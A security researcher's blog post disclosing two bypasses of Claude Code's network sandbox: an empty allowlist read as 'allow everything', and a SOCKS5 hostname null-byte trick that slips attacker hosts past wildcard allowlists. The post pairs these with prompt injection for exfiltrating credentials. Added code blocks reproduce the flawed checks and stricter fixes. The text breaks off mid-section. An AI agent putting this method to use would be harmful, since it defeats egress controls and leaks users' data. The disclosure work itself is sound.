Anthropic Claude Code sandbox bypass allows second data exfiltration exploit


Second Time, Same Sandbox: Another Anthropic Claude Code Network Sandbox Bypass Enables Data Exfiltration | Aonan Guan

Claude Code, shown its own exploit, confirms the bypass.

The first time, the sandbox heard “allow nothing” and did “allow everything” (CVE-2025-66479). This time, an attacker who runs code inside the sandbox can defeat any wildcard allowlist (e.g. *.google.com, *.anthropic.com) with a single null byte in a SOCKS5 hostname:

Policy sees: attacker-host.com\x00.google.com -> endsWith(".google.com") == true
Resolver sees: attacker-host.com -> actually dials blocked host

TL;DR

The sandbox has been bypassable since it shipped. Two distinct bugs in Anthropic Claude Code’s network sandbox, both live from sandbox GA on 2025-10-20. Every release from 2.0.24 through 2.1.89 was vulnerable to at least one of them. About 5.5 months and ~130 published versions. There was never a moment when the sandbox actually worked.

Finding 1 (CVE-2025-66479, recap): the user copied allowedDomains: [] from the doc to mean “block all outbound traffic.” Claude Code read it as “allow everything.” Patched in v2.0.55 on 2025-11-26, the same release that still shipped Finding 2 below.

Finding 2 (this post): SOCKS5 hostname null-byte injection. The user’s policy says allow only *.google.com. The attacker sends a hostname like attacker-host.com\x00.google.com. The filter sees the trailing .google.com and approves; the OS truncates at the null byte and dials attacker-host.com. Silently fixed in v2.1.90 on 2026-04-01.

No Claude Code security advisory for either finding. No security note in the changelog, no CVE for Claude Code, no notice to users on the ~130 vulnerable releases. A user finds out only by reverse-engineering cli.js or reading this post.

What an attacker gets. Combined with prompt injection (e.g. a hidden instruction in a GitHub issue comment that Claude Code reads), anything inside the sandbox can be sent to any server on the internet. Credentials, source code, environment variables, internal data. Even when the user has restricted egress to a strict wildcard allowlist.

The Pattern

sequenceDiagram
participant P as Sandboxed Process
participant SOCKS as SOCKS5 Proxy<br>(JS filter, on host)
participant DNS as getaddrinfo<br>(libc, on host)
participant T as Target
P->>SOCKS: CONNECT example.com\x00.google.com:80
Note over SOCKS: hostname.endsWith('.google.com')<br>= true → ALLOW
SOCKS->>DNS: resolve(example.com\x00.google.com)
Note over DNS: C string terminates at \x00<br>actually resolves "example.com"
DNS-->>SOCKS: A record for example.com
SOCKS->>T: TCP example.com:80
Note over T: Blocked host reached.<br>Outbound exfiltration channel open.

OS-level enforcement (sandbox-exec on macOS, bubblewrap on Linux) correctly pins the agent to localhost. The bypass lives in the SOCKS proxy the sandbox delegates egress decisions to, which runs on the host with full network privileges. Fool the proxy, and the host dials.

The Sandbox That Never Quite Closed

Claude Code’s network sandbox went GA on 2025-10-20 (v2.0.24, changelog: “Releasing a sandbox mode for the BashTool on Linux & Mac”). From that day until v2.1.90 shipped on 2026-04-01, every release was bypassable.

| Window | Status |
| --- | --- |
| 2025-10-20 (v2.0.24, sandbox GA) → 2025-11-26 (v2.0.55) | Vulnerable to BOTH bugs: CVE-2025-66479 and the SOCKS5 null-byte bypass. |
| 2025-11-26 (v2.0.55) → 2026-03-31 (v2.1.89) | Finding 1 patched. Finding 2 still live in every release. The version that fixed the first bypass shipped the second on the same day. |
| 2026-04-01 (v2.1.90) → present | Second bypass silently patched. |

Both times this sandbox has been examined by an outside researcher, the result was a complete bypass. One outside report is luck. Two is implementation.

Finding 1: “Allow Nothing” Was Read as “Allow Everything” (CVE-2025-66479, recap)

The first bypass: a user who wrote allowedDomains: [], the most restrictive setting the API offered (meaning block all outbound traffic), got the most permissive behavior. The check was allowedDomains.length > 0. An empty array evaluated to false and silently disabled the proxy.
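The fail-open gate described above next to a fail-closed one, as an added example (not code from Claude Code, sandbox-runtime or the original post). The function names, the mode labels and the treatment of an absent key as "unrestricted" are assumptions of this sketch; only the `allowedDomains.length > 0` check comes from the post.

```javascript
// Added illustration; not Claude Code or sandbox-runtime source.
// Flawed gate as the post describes it: filtering is enabled only when the
// list is non-empty, so [] turns filtering off instead of denying everything.
function egressModeFlawed(settings) {
  const allowedDomains = settings.allowedDomains || [];
  return allowedDomains.length > 0 ? 'filtered' : 'unrestricted';
}

// Fail-closed gate: the presence of the key decides whether filtering applies;
// the list contents only decide what passes. Treating an absent key as
// "unrestricted" is an assumption of this sketch.
function egressModeFailClosed(settings) {
  if (!('allowedDomains' in settings)) return 'unrestricted';
  const list = settings.allowedDomains;
  if (!Array.isArray(list) || !list.every((d) => typeof d === 'string' && d.length > 0)) {
    return 'deny-all'; // a malformed policy must not degrade to open egress
  }
  return list.length === 0 ? 'deny-all' : 'filtered';
}

// Decision for one destination under either gate (exact match only, for brevity).
function isAllowed(settings, host, modeFn) {
  const mode = modeFn(settings);
  if (mode === 'unrestricted') return true;
  if (mode === 'deny-all') return false;
  return settings.allowedDomains.includes(host);
}

// Constructed settings objects covering absent, empty, populated and malformed.
const sampleSettings = [
  {},
  { allowedDomains: [] },
  { allowedDomains: ['api.example.com'] },
  { allowedDomains: null },
];
for (const s of sampleSettings) {
  console.log(JSON.stringify(s), egressModeFlawed(s), egressModeFailClosed(s));
}
```
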
The user said “allow nothing.” The implementation heard “allow everything.”

CVE-2025-66479 was issued against sandbox-runtime on 2025-12-02. Claude Code itself, the product where users wrote allowedDomains: [] in settings.json and trusted the sandbox to enforce it, got no CVE, no advisory, no changelog flag. A team running that config in production from October 20 through November 26 had no way to know the sandbox was effectively off, and no notice afterwards that it had ever been off. The CVE shipped against a library most Claude Code users do not know exists by name.

Finding 2: SOCKS5 Hostname Null-Byte Injection

Policy sees:...
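The policy/resolver mismatch this post describes, as an added example (not code from Claude Code, sandbox-runtime or the original post): a SOCKS5 CONNECT parser, the suffix check, the C-string view of the same bytes, and a validator that checks the name before matching it. The function names, the LDH label rule and the sample requests are assumptions of this sketch; the post does not show the fix shipped in v2.1.90.

```javascript
// Added illustration; not Claude Code or sandbox-runtime source.
// Parse the DOMAINNAME form of a SOCKS5 CONNECT request (RFC 1928, section 4):
// VER=5, CMD=1, RSV, ATYP=3, LEN, <LEN bytes of name>, PORT (2 bytes, big-endian).
function parseSocks5Connect(buf) {
  if (buf.length < 7 || buf[0] !== 0x05 || buf[1] !== 0x01 || buf[3] !== 0x03) {
    throw new Error('not a SOCKS5 CONNECT with a domain name');
  }
  const len = buf[4];
  if (buf.length < 5 + len + 2) throw new Error('truncated request');
  // latin1 maps each byte to one code unit, so no byte is hidden or merged.
  return { host: buf.toString('latin1', 5, 5 + len), port: buf.readUInt16BE(5 + len) };
}

// Wildcard check of the kind the post describes: suffix match on the raw string.
function allowedNaive(host, patterns) {
  return patterns.some((p) => host.endsWith(p.slice(1))); // "*.google.com" -> ".google.com"
}

// What a C-string API such as getaddrinfo acts on: the bytes before the first NUL.
function asCString(host) {
  const i = host.indexOf('\0');
  return i === -1 ? host : host.slice(0, i);
}

// Stricter order: validate the name as letter-digit-hyphen labels, then match.
const LABEL = /^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$/;
function allowedStrict(host, patterns) {
  const name = host.toLowerCase();
  if (name.length === 0 || name.length > 253) return false;
  if (!name.split('.').every((label) => LABEL.test(label))) return false;
  return patterns.some((p) => name.endsWith(p.slice(1)));
}

// Constructed requests; the first carries the hostname shape quoted in the post.
function buildRequest(host, port) {
  const name = Buffer.from(host, 'latin1');
  return Buffer.concat([Buffer.from([5, 1, 0, 3, name.length]), name, Buffer.from([port >> 8, port & 0xff])]);
}

const POLICY = ['*.google.com'];
const evil = parseSocks5Connect(buildRequest('attacker-host.com\0.google.com', 443));
const good = parseSocks5Connect(buildRequest('mail.google.com', 443));
console.log(allowedNaive(evil.host, POLICY), asCString(evil.host), allowedStrict(evil.host, POLICY));
console.log(allowedNaive(good.host, POLICY), asCString(good.host), allowedStrict(good.host, POLICY));
```

The general rule is that the string the policy approves must be byte-for-byte the string the resolver receives; rejecting anything outside the hostname grammar before matching is one way to guarantee that.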

